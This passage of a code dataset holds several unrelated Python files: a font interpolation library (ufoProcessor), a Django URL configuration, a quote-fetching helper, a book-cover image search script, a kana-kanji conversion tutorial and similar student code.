DesignSpaceProcessor(ufoVersion=outputUFOFormatVersion)\n document.useVarlib = useVarlib\n document.roundGeometry = roundGeometry\n document.read(path)\n try:\n r = document.generateUFO(processRules=processRules)\n results.append(r)\n except:\n if logger:\n logger.exception(\"ufoProcessor error\")\n #results += document.generateUFO(processRules=processRules)\n reader = None\n return results\n\n\ndef getUFOVersion(ufoPath):\n # Peek into a ufo to read its format version. \n # <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n # <!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n # <plist version=\"1.0\">\n # <dict>\n # <key>creator</key>\n # <string>org.robofab.ufoLib</string>\n # <key>formatVersion</key>\n # <integer>2</integer>\n # </dict>\n # </plist>\n metaInfoPath = os.path.join(ufoPath, u\"metainfo.plist\")\n p = plistlib.readPlist(metaInfoPath)\n return p.get('formatVersion')\n\n\ndef swapGlyphNames(font, oldName, newName, swapNameExtension = \"_______________swap\"):\n # In font swap the glyphs oldName and newName.\n # Also swap the names in components in order to preserve appearance.\n # Also swap the names in font groups. 
\n if not oldName in font or not newName in font:\n return None\n swapName = oldName + swapNameExtension\n # park the old glyph \n if not swapName in font:\n font.newGlyph(swapName)\n # swap the outlines\n font[swapName].clear()\n p = font[swapName].getPointPen()\n font[oldName].drawPoints(p)\n font[swapName].width = font[oldName].width\n # lib?\n font[oldName].clear()\n p = font[oldName].getPointPen()\n font[newName].drawPoints(p)\n font[oldName].width = font[newName].width\n \n font[newName].clear()\n p = font[newName].getPointPen()\n font[swapName].drawPoints(p)\n font[newName].width = font[swapName].width\n \n # remap the components\n for g in font:\n for c in g.components:\n if c.baseGlyph == oldName:\n c.baseGlyph = swapName\n continue\n for g in font:\n for c in g.components:\n if c.baseGlyph == newName:\n c.baseGlyph = oldName\n continue\n for g in font:\n for c in g.components:\n if c.baseGlyph == swapName:\n c.baseGlyph = newName\n \n # change the names in groups\n # the shapes will swap, that will invalidate the kerning\n # so the names need to swap in the kerning as well.\n newKerning = {}\n for first, second in font.kerning.keys():\n value = font.kerning[(first,second)]\n if first == oldName:\n first = newName\n elif first == newName:\n first = oldName\n if second == oldName:\n second = newName\n elif second == newName:\n second = oldName\n newKerning[(first, second)] = value\n font.kerning.clear()\n font.kerning.update(newKerning)\n \n for groupName, members in font.groups.items():\n newMembers = []\n for name in members:\n if name == oldName:\n newMembers.append(newName)\n elif name == newName:\n newMembers.append(oldName)\n else:\n newMembers.append(name)\n font.groups[groupName] = newMembers\n \n remove = []\n for g in font:\n if g.name.find(swapNameExtension)!=-1:\n remove.append(g.name)\n for r in remove:\n del font[r]\n\n\nclass DecomposePointPen(object):\n \n def __init__(self, glyphSet, outPointPen):\n self._glyphSet = glyphSet\n self._outPointPen = outPointPen\n self.beginPath = outPointPen.beginPath\n self.endPath = outPointPen.endPath\n self.addPoint = outPointPen.addPoint\n \n def addComponent(self, baseGlyphName, transformation):\n if baseGlyphName in self._glyphSet:\n baseGlyph = self._glyphSet[baseGlyphName]\n if transformation == _defaultTransformation:\n baseGlyph.drawPoints(self)\n else:\n transformPointPen = TransformPointPen(self, transformation)\n baseGlyph.drawPoints(transformPointPen)\n\n\n\nclass DesignSpaceProcessor(DesignSpaceDocument):\n \"\"\"\n A subclassed DesignSpaceDocument that can\n - process the document and generate finished UFOs with MutatorMath or varLib.model.\n - read and write documents\n - Replacement for the mutatorMath.ufo generator.\n \"\"\"\n\n fontClass = defcon.Font\n glyphClass = defcon.Glyph\n libClass = defcon.Lib\n glyphContourClass = defcon.Contour\n glyphPointClass = defcon.Point\n glyphComponentClass = defcon.Component\n glyphAnchorClass = defcon.Anchor\n kerningClass = defcon.Kerning\n groupsClass = defcon.Groups\n infoClass = defcon.Info\n featuresClass = defcon.Features\n\n mathInfoClass = MathInfo\n mathGlyphClass = MathGlyph\n mathKerningClass = MathKerning\n\n def __init__(self, readerClass=None, writerClass=None, fontClass=None, ufoVersion=3, useVarlib=False):\n super(DesignSpaceProcessor, self).__init__(readerClass=readerClass, writerClass=writerClass)\n\n self.ufoVersion = ufoVersion # target UFO version\n self.useVarlib = useVarlib\n self.roundGeometry = False\n self._glyphMutators = {}\n self._infoMutator = 
None\n self._kerningMutator = None\n self.fonts = {}\n self._fontsLoaded = False\n self.glyphNames = [] # list of all glyphnames\n self.processRules = True\n self.problems = [] # receptacle for problem notifications. Not big enough to break, but also not small enough to ignore.\n if readerClass is not None:\n print(\"ufoProcessor.ruleDescriptorClass\", readerClass.ruleDescriptorClass)\n\n def generateUFO(self, processRules=True):\n # makes the instances\n # option to execute the rules\n # make sure we're not trying to overwrite a newer UFO format\n self.loadFonts()\n self.findDefault()\n if self.default is None:\n # we need one to genenerate\n raise UFOProcessorError(\"Can't generate UFO from this designspace: no default font.\", self)\n v = 0\n for instanceDescriptor in self.instances:\n if instanceDescriptor.path is None:\n continue\n font = self.makeInstance(instanceDescriptor, processRules)\n folder = os.path.dirname(instanceDescriptor.path)\n path = instanceDescriptor.path\n if not os.path.exists(folder):\n os.makedirs(folder)\n if os.path.exists(path):\n existingUFOFormatVersion = getUFOVersion(path)\n if existingUFOFormatVersion > self.ufoVersion:\n self.problems.append(u\"Can’t overwrite existing UFO%d with UFO%d.\" % (existingUFOFormatVersion, self.ufoVersion))\n continue\n font.save(path, self.ufoVersion)\n self.problems.append(\"Generated %s as UFO%d\"%(os.path.basename(path), self.ufoVersion))\n return True\n\n def getSerializedAxes(self):\n return [a.serialize() for a in self.axes]\n\n def getMutatorAxes(self):\n d = collections.OrderedDict()\n\n for a in self.axes:\n d[a.name] = a.serialize()\n return d\n\n serializedAxes = property(getSerializedAxes, doc=\"a list of dicts with the axis values\")\n\n def getVariationModel(self, items, axes, bias=None):\n # Return either a mutatorMath or a varlib.model object for calculating. \n try:\n if self.useVarlib:\n # use the varlib variation model\n return dict(), VariationModelMutator(items, self.axes)\n else:\n # use mutatormath model\n axesForMutator = self.getMutatorAxes()\n return buildMutator(items, axes=axesForMutator, bias=bias)\n except:\n error = traceback.format_exc()\n self.problems.append(\"UFOProcessor.getVariationModel error: %s\" % error)\n return None\n\n def getInfoMutator(self):\n \"\"\" Returns a info mutator \"\"\"\n if self._infoMutator:\n return self._infoMutator\n infoItems = []\n for sourceDescriptor in self.sources:\n loc = sourceDescriptor.location\n sourceFont = self.fonts[sourceDescriptor.name]\n infoItems.append((loc, self.mathInfoClass(sourceFont)))\n bias, self._infoMutator = self.getVariationModel(infoItems, axes=self.serializedAxes, bias=self.defaultLoc)\n return self._infoMutator\n\n def getKerningMutator(self):\n \"\"\" Return a kerning mutator, collect the sources, build mathGlyphs. \"\"\"\n if self._kerningMutator:\n return self._kerningMutator\n kerningItems = []\n for sourceDescriptor in self.sources:\n loc = sourceDescriptor.location\n sourceFont = self.fonts[sourceDescriptor.name]\n # this makes assumptions about the groups of all sources being the same. 
\n kerningItems.append((loc, self.mathKerningClass(sourceFont.kerning, sourceFont.groups)))\n bias, self._kerningMutator = self.getVariationModel(kerningItems, axes=self.serializedAxes, bias=self.defaultLoc)\n return self._kerningMutator\n\n def getGlyphMutator(self, glyphName, decomposeComponents=False, fromCache=True):\n cacheKey = (glyphName, decomposeComponents)\n if cacheKey in self._glyphMutators and fromCache:\n return self._glyphMutators[cacheKey]\n items = self.collectMastersForGlyph(glyphName, decomposeComponents=decomposeComponents)\n new = []\n for a, b, c in items:\n if hasattr(b, \"toMathGlyph\"):\n new.append((a,b.toMathGlyph()))\n else:\n new.append((a,self.mathGlyphClass(b)))\n items = new\n bias, thing = self.getVariationModel(items, axes=self.serializedAxes, bias=self.defaultLoc)\n self._glyphMutators[cacheKey] = thing\n return thing\n\n def collectMastersForGlyph(self, glyphName, decomposeComponents=False):\n \"\"\" Return a glyph mutator.defaultLoc\n decomposeComponents = True causes the source glyphs to be decomposed first\n before building the mutator. That gives you instances that do not depend\n on a complete font. If you're calculating previews for instance.\n\n XXX check glyphs in layers\n \"\"\"\n items = []\n for sourceDescriptor in self.sources:\n loc = sourceDescriptor.location\n f = self.fonts[sourceDescriptor.name]\n sourceLayer = f\n if glyphName in sourceDescriptor.mutedGlyphNames:\n continue\n if not glyphName in f:\n # log this>\n continue\n layerName = \"foreground\"\n # handle source layers\n\n if sourceDescriptor.layerName is not None:\n # start looking for a layer\n if sourceDescriptor.layerName in f.layers:\n sourceLayer = f.layers[sourceDescriptor.layerName]\n layerName = sourceDescriptor.layerName\n # start looking for a glyph\n if glyphName not in sourceLayer:\n # this might be a support in a sparse layer\n # so we're skipping!\n #print(\"XXXX\", glyphName, \"not in\", sourceDescriptor.layerName)\n continue\n sourceGlyphObject = sourceLayer[glyphName]\n if decomposeComponents:\n # what about decomposing glyphs in a partial font?\n temp = self.glyphClass()\n p = temp.getPointPen()\n dpp = DecomposePointPen(sourceLayer, p)\n sourceGlyphObject.drawPoints(dpp)\n temp.width = sourceGlyphObject.width\n temp.name = sourceGlyphObject.name\n #temp.lib = sourceGlyphObject.lib\n processThis = temp\n else:\n processThis = sourceGlyphObject\n sourceInfo = dict(source=f.path, glyphName=glyphName, layerName=layerName, location=sourceDescriptor.location, sourceName=sourceDescriptor.name)\n if hasattr(processThis, \"toMathGlyph\"):\n processThis = processThis.toMathGlyph()\n else:\n processThis = self.mathGlyphClass(processThis)\n items.append((loc, processThis, sourceInfo))\n return items\n\n def getNeutralFont(self):\n # Return a font object for the neutral font\n # self.fonts[self.default.name] ?\n neutralLoc = self.newDefaultLocation()\n for sd in self.sources:\n if sd.location == neutralLoc:\n if sd.name in self.fonts:\n return self.fonts[sd.name]\n return None\n\n def loadFonts(self, reload=False):\n # Load the fonts and find the default candidate based on the info flag\n if self._fontsLoaded and not reload:\n return\n names = set()\n for sourceDescriptor in self.sources:\n if not sourceDescriptor.name in self.fonts:\n if os.path.exists(sourceDescriptor.path):\n self.fonts[sourceDescriptor.name] = self._instantiateFont(sourceDescriptor.path)\n self.problems.append(\"loaded master from %s, format %d\" % (sourceDescriptor.path, 
getUFOVersion(sourceDescriptor.path)))\n names = names | set(self.fonts[sourceDescriptor.name].keys())\n else:\n self.fonts[sourceDescriptor.name] = None\n self.problems.append(\"source ufo not found at %s\" % (sourceDescriptor.path))\n self.glyphNames = list(names)\n self._fontsLoaded = True\n\n def getFonts(self):\n # returnn a list of (font object, location) tuples\n fonts = []\n for sourceDescriptor in self.sources:\n f = self.fonts.get(sourceDescriptor.name)\n if f is not None:\n fonts.append((f, sourceDescriptor.location))\n return fonts\n\n def makeInstance(self, instanceDescriptor, doRules=False, glyphNames=None):\n \"\"\" Generate a font object for this instance \"\"\"\n font = self._instantiateFont(None)\n # make fonty things here\n loc = instanceDescriptor.location\n anisotropic = False\n locHorizontal = locVertical = loc\n if self.isAnisotropic(loc):\n anisotropic = True\n locHorizontal, locVertical = self.splitAnisotropic(loc)\n # groups\n if hasattr(self.fonts[self.default.name], \"kerningGroupConversionRenameMaps\"):\n renameMap = self.fonts[self.default.name].kerningGroupConversionRenameMaps\n else:\n renameMap = {}\n font.kerningGroupConversionRenameMaps = renameMap\n # make the kerning\n # this kerning is always horizontal. We can take the horizontal location\n if instanceDescriptor.kerning:\n try:\n kerningMutator = self.getKerningMutator()\n kerningObject = kerningMutator.makeInstance(locHorizontal)\n kerningObject.extractKerning(font)\n except:\n self.problems.append(\"Could not make kerning for %s. %s\" % (loc, traceback.format_exc()))\n # make the info\n try:\n infoMutator = self.getInfoMutator()\n if not anisotropic:\n infoInstanceObject = infoMutator.makeInstance(loc)\n else:\n horizontalInfoInstanceObject = infoMutator.makeInstance(locHorizontal)\n verticalInfoInstanceObject = infoMutator.makeInstance(locVertical)\n # merge them again\n infoInstanceObject = (1,0)*horizontalInfoInstanceObject + (0,1)*verticalInfoInstanceObject\n infoInstanceObject.extractInfo(font.info)\n font.info.familyName = instanceDescriptor.familyName\n font.info.styleName = instanceDescriptor.styleName\n font.info.postScriptFontName = instanceDescriptor.postScriptFontName\n font.info.styleMapFamilyName = instanceDescriptor.styleMapFamilyName\n font.info.styleMapStyleName = instanceDescriptor.styleMapStyleName\n # NEED SOME HELP WITH THIS\n # localised names need to go to the right openTypeNameRecords\n # records = []\n # nameID = 1\n # platformID = \n # for languageCode, name in instanceDescriptor.localisedStyleMapFamilyName.items():\n # # Name ID 1 (font family name) is found at the generic styleMapFamily attribute.\n # records.append((nameID, ))\n except:\n self.problems.append(\"Could not make fontinfo for %s. 
%s\" % (loc, traceback.format_exc()))\n for sourceDescriptor in self.sources:\n if sourceDescriptor.copyInfo:\n # this is the source\n self._copyFontInfo(self.fonts[sourceDescriptor.name].info, font.info)\n if sourceDescriptor.copyLib:\n # excplicitly copy the font.lib items\n for key, value in self.fonts[sourceDescriptor.name].lib.items():\n font.lib[key] = value\n if sourceDescriptor.copyFeatures:\n featuresText = self.fonts[sourceDescriptor.name].features.text\n if isinstance(featuresText, str):\n font.features.text = u\"\"+featuresText\n elif isinstance(featuresText, unicode):\n font.features.text = featuresText\n # glyphs\n if glyphNames:\n selectedGlyphNames = glyphNames\n else:\n selectedGlyphNames = self.glyphNames\n # add the glyphnames to the font.lib['public.glyphOrder']\n if not 'public.glyphOrder' in font.lib.keys():\n font.lib['public.glyphOrder'] = selectedGlyphNames\n for glyphName in selectedGlyphNames:\n try:\n glyphMutator = self.getGlyphMutator(glyphName)\n if glyphMutator is None:\n continue\n except:\n self.problems.append(\"Could not make mutator for glyph %s %s\" % (glyphName, traceback.format_exc()))\n continue\n if glyphName in instanceDescriptor.glyphs.keys():\n # XXX this should be able to go now that we have full rule support. \n # reminder: this is what the glyphData can look like\n # {'instanceLocation': {'custom': 0.0, 'weight': 824.0},\n # 'masters': [{'font': 'master.Adobe VF Prototype.Master_0.0',\n # 'glyphName': 'dollar.nostroke',\n # 'location': {'custom': 0.0, 'weight': 0.0}},\n # {'font': 'master.Adobe VF Prototype.Master_1.1',\n # 'glyphName': 'dollar.nostroke',\n # 'location': {'custom': 0.0, 'weight': 368.0}},\n # {'font': 'master.Adobe VF Prototype.Master_2.2',\n # 'glyphName': 'dollar.nostroke',\n # 'location': {'custom': 0.0, 'weight': 1000.0}},\n # {'font': 'master.Adobe VF Prototype.Master_3.3',\n # 'glyphName': 'dollar.nostroke',\n # 'location': {'custom': 100.0, 'weight': 1000.0}},\n # {'font': 'master.Adobe VF Prototype.Master_0.4',\n # 'glyphName': 'dollar.nostroke',\n # 'location': {'custom': 100.0, 'weight': 0.0}},\n # {'font': 'master.Adobe VF Prototype.Master_4.5',\n # 'glyphName': 'dollar.nostroke',\n # 'location': {'custom': 100.0, 'weight': 368.0}}],\n # 'unicodes': [36]}\n glyphData = instanceDescriptor.glyphs[glyphName]\n else:\n glyphData = {}\n font.newGlyph(glyphName)\n font[glyphName].clear()\n if glyphData.get('mute', False):\n # mute this glyph, skip\n continue\n glyphInstanceLocation = glyphData.get(\"instanceLocation\", instanceDescriptor.location)\n uniValues = []\n neutral = glyphMutator.get(())\n if neutral is not None:\n uniValues = neutral[0].unicodes\n glyphInstanceUnicodes = glyphData.get(\"unicodes\", uniValues)\n note = glyphData.get(\"note\")\n if note:\n font[glyphName] = note\n masters = glyphData.get(\"masters\", None)\n if masters:\n items = []\n for glyphMaster in masters:\n sourceGlyphFont = glyphMaster.get(\"font\")\n sourceGlyphName = glyphMaster.get(\"glyphName\", glyphName)\n m = self.fonts.get(sourceGlyphFont)\n if not sourceGlyphName in m:\n continue\n if hasattr(m[sourceGlyphName], \"toMathGlyph\"):\n sourceGlyph = m[sourceGlyphName].toMathGlyph()\n else:\n sourceGlyph = MathGlyph(m[sourceGlyphName])\n sourceGlyphLocation = glyphMaster.get(\"location\")\n items.append((sourceGlyphLocation, sourceGlyph))\n bias, glyphMutator = self.getVariationModel(items, axes=self.serializedAxes, bias=self.defaultLoc)\n try:\n if not self.isAnisotropic(glyphInstanceLocation):\n glyphInstanceObject = 
glyphMutator.makeInstance(glyphInstanceLocation)\n else:\n # split anisotropic location into horizontal and vertical components\n horizontal, vertical = self.splitAnisotropic(glyphInstanceLocation)\n horizontalGlyphInstanceObject = glyphMutator.makeInstance(horizontal)\n verticalGlyphInstanceObject = glyphMutator.makeInstance(vertical)\n # merge them again\n glyphInstanceObject = (0,1)*horizontalGlyphInstanceObject + (1,0)*verticalGlyphInstanceObject\n except IndexError:\n # alignment problem with the data?\n print(\"Error making instance %s\" % glyphName)\n continue\n font.newGlyph(glyphName)\n font[glyphName].clear()\n if self.roundGeometry:\n try:\n glyphInstanceObject = glyphInstanceObject.round()\n except AttributeError:\n pass\n try:\n glyphInstanceObject.extractGlyph(font[glyphName], onlyGeometry=True)\n except TypeError:\n # this causes ruled glyphs to end up in the wrong glyphname\n # but defcon2 objects don't support it\n pPen = font[glyphName].getPointPen()\n font[glyphName].clear()\n glyphInstanceObject.drawPoints(pPen)\n font[glyphName].width = glyphInstanceObject.width\n font[glyphName].unicodes = glyphInstanceUnicodes\n if doRules:\n resultNames = processRules(self.rules, loc, self.glyphNames)\n for oldName, newName in zip(self.glyphNames, resultNames):\n if oldName != newName:\n swapGlyphNames(font, oldName, newName)\n # copy the glyph lib?\n #for sourceDescriptor in self.sources:\n # if sourceDescriptor.copyLib:\n # pass\n # pass\n # store designspace location in the font.lib\n font.lib['designspace'] = list(instanceDescriptor.location.items())\n return font\n\n def isAnisotropic(self, location):\n for v in location.values():\n if type(v)==tuple:\n return True\n return False\n\n def splitAnisotropic(self, location):\n x = {}\n y = {}\n for dim, val in location.items():\n if type(val)==tuple:\n x[dim] = val[0]\n y[dim] = val[1]\n else:\n x[dim] = y[dim] = val\n return x, y\n\n def _instantiateFont(self, path):\n \"\"\" Return a instance of a font object with all the given subclasses\"\"\"\n try:\n return self.fontClass(path,\n libClass=self.libClass,\n kerningClass=self.kerningClass,\n groupsClass=self.groupsClass,\n infoClass=self.infoClass,\n featuresClass=self.featuresClass,\n glyphClass=self.glyphClass,\n glyphContourClass=self.glyphContourClass,\n glyphPointClass=self.glyphPointClass,\n glyphComponentClass=self.glyphComponentClass,\n glyphAnchorClass=self.glyphAnchorClass)\n except TypeError:\n # if our fontClass doesnt support all the additional classes\n return self.fontClass(path)\n\n def _copyFontInfo(self, sourceInfo, targetInfo):\n \"\"\" Copy the non-calculating fields from the source info.\"\"\"\n infoAttributes = [\n \"versionMajor\",\n \"versionMinor\",\n \"copyright\",\n \"trademark\",\n \"note\",\n \"openTypeGaspRangeRecords\",\n \"openTypeHeadCreated\",\n \"openTypeHeadFlags\",\n \"openTypeNameDesigner\",\n \"openTypeNameDesignerURL\",\n \"openTypeNameManufacturer\",\n \"openTypeNameManufacturerURL\",\n \"openTypeNameLicense\",\n \"openTypeNameLicenseURL\",\n \"openTypeNameVersion\",\n \"openTypeNameUniqueID\",\n \"openTypeNameDescription\",\n \"#openTypeNamePreferredFamilyName\",\n \"#openTypeNamePreferredSubfamilyName\",\n \"#openTypeNameCompatibleFullName\",\n \"openTypeNameSampleText\",\n \"openTypeNameWWSFamilyName\",\n \"openTypeNameWWSSubfamilyName\",\n \"openTypeNameRecords\",\n \"openTypeOS2Selection\",\n \"openTypeOS2VendorID\",\n \"openTypeOS2Panose\",\n \"openTypeOS2FamilyClass\",\n \"openTypeOS2UnicodeRanges\",\n 
\"openTypeOS2CodePageRanges\",\n \"openTypeOS2Type\",\n \"postscriptIsFixedPitch\",\n \"postscriptForceBold\",\n \"postscriptDefaultCharacter\",\n \"postscriptWindowsCharacterSet\"\n ]\n for infoAttribute in infoAttributes:\n copy = False\n if self.ufoVersion == 1 and infoAttribute in fontInfoAttributesVersion1:\n copy = True\n elif self.ufoVersion == 2 and infoAttribute in fontInfoAttributesVersion2:\n copy = True\n elif self.ufoVersion == 3 and infoAttribute in fontInfoAttributesVersion3:\n copy = True\n if copy:\n value = getattr(sourceInfo, infoAttribute)\n setattr(targetInfo, infoAttribute, value)\n\n\n","sub_path":"Lib/ufoProcessor/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":30065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"170672724","text":"from django.urls import path, include\nfrom . import views\n\nurlpatterns = [\n path('', views.catalog, name=\"catalog\"),\n path('accounts/', include('django.contrib.auth.urls')),\n path('register/', views.RegisterView.as_view()),\n path('logout/', views.LogoutView.as_view()),\n path('accounts/profile/', views.toHomepage),\n path('cart/', views.cart, name='cart'),\n path('orders/', views.orders, name='orders'),\n path('admission/', views.admission, name='admission'),\n path('admissions/', views.getAdmissions, name='admissions')\n]\n","sub_path":"students/y2335/laboratory_works/Dmitriev_Nikita/laboratory_work_1/shop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"132093223","text":"\n\n\n\"\"\"\n请求一言\n\"\"\"\nimport requests\n\nfrom rover.common import is_json\n\n\n\"\"\"\n{\n \"id\": 3854,\n \"hitokoto\": \"忘羡一曲心系君,瀚海百重长相忆。\",\n \"type\": \"d\",\n \"from\": \"魔道祖师\",\n \"creator\": \"我養你啊_\",\n \"created_at\": \"1537446304\"\n}\n\"\"\"\n\n\ndef request_one_word():\n base_url = \"https://international.v1.hitokoto.cn/\"\n try:\n resp = requests.get(base_url)\n if resp.status_code == 200 and is_json(resp):\n resp = resp.json()\n hitokoto = resp.get(\"hitokoto\")\n creator = resp.get(\"creator\")\n return hitokoto\n except Exception as e:\n print(\"获取一言失败!\")\n print(e)\n return None\n","sub_path":"aphorisms/requestOneWord.py","file_name":"requestOneWord.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"103741097","text":"import torch.nn.functional as F\nimport numpy as np\nimport random\n\n\ndef test_classification(net, test_data, test_targets):\n patterns = []\n\n for i in range(10):\n patterns.append(test_data[np.where(test_targets == i)[0][4]])\n\n true = 0\n to_test = [random.randint(0, 9999) for i in range(50)]\n for test_idx in to_test:\n\n distances = []\n img0 = test_data[test_idx].unsqueeze(0)\n true_label = test_targets[test_idx]\n\n for i in range(10):\n img1 = patterns[i].unsqueeze(0)\n img0, img1 = img0.cuda(), img1.cuda()\n\n output_f0 = net(img0)\n output_f1 = net(img1)\n\n euclidean_distance = F.pairwise_distance(output_f0, output_f1)\n distances.append(euclidean_distance[0])\n min_idx = np.argmin(distances)\n if min_idx == true_label:\n true += 1\n print('Accuracy: {}'.format(true / len(to_test)))\n","sub_path":"classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} 
+{"seq_id":"542668934","text":"from Russian_Flash_Cards import *\n\nclass NoSingleWords():\n\n NSW_Deck = []\n Pause = 10\n\n def __init__(self):\n pass\n\n def play_audio(self):\n pass\n\n def play_deck(self, Deck):\n if len(Deck) < 1:\n print(\"\\nDeck complete!!\\n\")\n else:\n r = randint(0, len(Deck)-1)\n\n #\n # STILL NEED TO ADD FORMATING AND SUCH\n #\n\n # PRINT RU\n print(colored(Deck[r][1], \"green\"))\n sleep(self.Pause)\n\n # PRINT ANSWER\n print(colored(Deck[r][2], \"yellow\"))\n print(colored(Deck[r][3], \"blue\"))\n if Deck[r][5] != \"False\":\n print(colored(Deck[r][5], \"white\"))\n if Deck[r][6] != \"False\":\n print(colored(Deck[r][6], \"red\"))\n\n\n # GET ANSWER\n answer = input(str(\"Did you get this right? \"))\n\n del Deck[r]\n if len(Deck) > 0:\n print(\"\\nCards left: \" + str(len(Deck)) +\"\\n\")\n self.play_deck(Deck)\n\n def build_deck(self):\n self.NSW_Deck = [] # To make sure it is empty!\n conn = mysql.connector.connect(**config)\n cur = conn.cursor()\n query = \"SELECT * FROM ru_words WHERE active='1'\"\n cur.execute(str(query))\n for i in cur:\n if i[7] in sentence_cats:\n self.NSW_Deck.append(i)\n cur.close()\n conn.close()\n\n def run(self):\n #Build Deck\n self.build_deck()\n print(\"\\n\")\n self.play_deck(self.NSW_Deck)\n\n\"\"\"\na = NoSingleWords()\na.run()\n\"\"\"","sub_path":"libs/No_Single_Words.py","file_name":"No_Single_Words.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"294011549","text":"from utilities.coverdescriptor import CoverDescriptor\nfrom utilities.covermatcher import CoverMatcher\nimport glob\nimport csv\nimport cv2\nimport ntpath\n\n\n# Define paths\ndatabase_path = 'books.csv'\ncovers_path = 'covers'\nquery_path = 'queries/query01.png'\n\n# Initialize the default parameters using BRISK is being used\nuse_sift = False\nuse_hamming = True\nratio = 0.7\nmin_matches = 40\n\n# Initialize the database dictionary of covers\ndatabase = {}\n\n# Loop over the database\nfor l in csv.reader(open(database_path)):\n\t# Update the database using the image ID as the key\n\tdatabase[l[0]] = l[1:]\n\n# If SIFT is to be used, then update the parameters\nif use_sift:\n\tmin_matches = 50\n\n# Initialize the cover descriptor and cover matcher\ncover_descriptor = CoverDescriptor(use_sift=use_sift)\ncover_matcher = CoverMatcher(cover_descriptor, glob.glob(covers_path + \"/*.png\"), ratio=ratio, min_matches=min_matches,\n\t\t\t\t\t\t\t use_hamming=use_hamming)\n\n# Load the query image, convert it to greyscale, and extract keypoints and descriptors\nquery_image = cv2.imread(query_path)\ngray = cv2.cvtColor(query_image, cv2.COLOR_BGR2GRAY)\n(query_keypoints, query_descriptors) = cover_descriptor.describe(gray)\n\n# Try to match the book cover to a known database of images\nresults = cover_matcher.search(query_keypoints, query_descriptors)\n\n# Show the query cover\ncv2.imshow(\"Query\", query_image)\n\n# Check to see if no results were found\nif len(results) == 0:\n\tprint(\"A match could not be found for that cover!\")\n\tcv2.waitKey(0)\n# Otherwise, matches were found\nelse:\n\t# Loop over the results\n\tfor (i, (score, cover_path)) in enumerate(results):\n\t\t# Grab the book information\n\t\t(author, title) = database[ntpath.basename(cover_path)]\n\t\tprint(\"{}. 
{:.2f}% : {} - {}\".format(i+1, score*100, author, title))\n\n\t\t# Load the result image and show it\n\t\tresult = cv2.imread(cover_path)\n\t\tcv2.imshow(\"Result\", result)\n\t\tcv2.waitKey(0)\n","sub_path":"practical_python-opencv_cases_studies/amazon_cover_search/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"453053512","text":"from collections import defaultdict\nimport math\n\n\nV = 10**6\nlambda1 = 0.95\nwith open('tm.txt') as model_file:\n transition = defaultdict(list)\n emission = defaultdict(list)\n possible_tags = dict()\n for line in model_file:\n tag, context, word, prob = line.strip().split()\n possible_tags[context] = 1\n if tag == \"E\":\n transition[word].append( [context, float(prob)])\n else:\n pass\n # transition[context +\" \"+ word] = float(prob)\n emission = dict(emission)\n# print(emission)\n#exit()\nlm_file = open('lm.txt').readlines()\nemission = defaultdict(lambda: .000001)\nfor line in lm_file:\n try:\n context, word, prob = line.strip().split()\n emission[context +\" \"+ word] = float(prob)\n except:\n pass\n\nwith open('../../data/wiki-ja-test.pron') as text:\n for line in text:\n line = line.strip()\n l = len(line)\n best_score = defaultdict(lambda :defaultdict(float))\n best_edge = defaultdict(dict)\n best_score[0][\"<s>\"] = 0\n best_edge[0][\"<s>\"] = 'NULL'\n for end in range(1,len(line) + 1):\n for begin in range(end):\n pron = line[begin:end]\n my_tm = transition.get(pron, [])\n if my_tm == [] and len(pron) == 1:\n my_tm.append([pron,.000001])\n for curr_word, tm_prob in my_tm:\n for prev_word, prev_score in best_score[begin].items():\n curr_score = prev_score - math.log(tm_prob * emission[prev_word +\" \"+ curr_word])\n\n if curr_word not in best_score[end] or curr_score < best_score[end][curr_word]:\n best_score[end][curr_word] = curr_score\n best_edge[end][curr_word] = (begin, prev_word)\n # process eos\n curr_word = \"</s>\"\n end = len(line) + 1\n begin = len(line)\n for prev_word, prev_score in best_score[begin].items():\n curr_score = prev_score -math.log(tm_prob * emission[pron +\" \"+ word])\n if curr_word not in best_score[end] or curr_score < best_score[end][curr_word]:\n best_score[end][curr_word] = curr_score\n best_edge[end][curr_word] = (begin, prev_word)\n\n # back_ward\n tags = []\n next_edge = best_edge[end][curr_word]\n while next_edge != (0, \"<s>\"):\n\n position, tag = next_edge\n tags.append(tag)\n next_edge = best_edge[position][tag]\n tags.reverse()\n print(\" \".join(tags)) \n\n","sub_path":"arai/tutorial14/kkc.py","file_name":"kkc.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"88974675","text":"# Author Toshihiko Aoki\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"for Bert pre-training input feature file\"\"\"\n\nfrom mptb import PretrainDataGeneration\n\n\nif __name__ == '__main__':\n 
